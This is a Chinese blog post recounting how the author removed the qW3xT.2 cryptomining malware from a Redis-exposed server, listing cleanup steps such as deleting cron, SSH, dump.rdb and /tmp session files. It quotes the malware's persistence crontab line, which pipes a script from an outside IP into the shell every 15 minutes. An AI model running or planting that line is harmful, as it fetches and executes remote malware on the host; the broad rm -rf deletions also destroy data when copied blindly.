记一次解决服务器病毒qW3xT.2经历

先是在服务器出现警告，说可能是挖矿的病毒。刚开始没当回事，当把这个病毒百度之后发现，很严重呐。

好了，开始干活。

第一步：

链接地址 ：https://blog.****.net/weixin_41228949/article/details/81501753

然鹅，没有成功。。。。。。（成功了大概半分钟，之后又活了）呵呵呵

第二步：

找出入侵IP

/var/spool/cron/crontabs

*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

curl -fsSL http://149.56.106.215:8000/i.sh

第三步：

将/root/.ssh/所有文件干掉（不认识或者看着不爽的，具体自己判断，我是全都干掉，心情不好。。。。。。）

第四步：继续干掉root文件和dump.rdb文件

rm –rf /var/spool/cron/root

/var/spool/cron/crontabs/root

rm –rf  /tmp/dump.rdb

rm –rf  /usr/local/redis/bin/ dump.rdb

rm –rf  /var/spool/cron/ dump.rdb

第五步：在继续干掉sess开头文件（我这有16个，心情不好都删了。。。。。。）

rm –rf /tmp/sess_* (共有16个file)  <内容均为visit_item_1|i:1;>

第六步：

最后在kill -9 xxx 这个病毒以及删除它。

不过我还是把这个IP加入了黑名单。

到此就结束。。。。。。

多说一句，我两台服务器被搞了，看个人运气吧总体来说，不过还有一个链接还是很不错的，在这里找到的灵感。（其实感觉是“模仿”的，哈哈）。

最后贴出链接：https://blog.****.net/zhanghan18333611647/article/details/65632827

=========================我是分割线=============================================

这是第一次清除此病毒，半月之后又出现此问题，流氓

再次贴出第二次清除经历：：：：：https://blog.****.net/qq_39424981/article/details/82461129